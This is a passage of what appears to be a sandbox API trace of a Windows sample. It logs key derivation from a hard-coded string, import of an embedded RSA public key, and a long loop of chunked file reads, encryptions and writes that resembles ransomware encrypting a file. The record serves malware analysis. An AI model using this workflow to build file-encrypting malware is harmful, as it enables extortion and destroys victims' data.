phHash=0x2b9ce64) returned 1 [0274.820] lstrlenA (lpString="CABLQIHbnDAxPSPigSVgweTqzMlQm") returned 29 [0274.821] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.821] CryptDeriveKey (in: hProv=0x2f2a168, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb708) returned 1 [0274.821] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.821] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.821] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a1f0) returned 1 [0274.821] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a1f0, dwCertEncodingType=0x1, pInfo=0x2f33af0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f33b20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f33b28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb508) returned 1 [0274.822] CryptEncrypt (in: hKey=0x2fb508, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.822] CryptEncrypt (in: hKey=0x2fb508, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2aa70*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2aa70*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.822] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2aa70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2aa70*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.823] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.825] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.825] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.891] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.892] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.892] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.892] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.892] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.892] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.893] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.893] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.893] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.893] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.894] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.894] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.895] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.895] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.896] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.896] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.897] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.897] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.898] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.898] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.899] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.899] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.899] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.899] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, 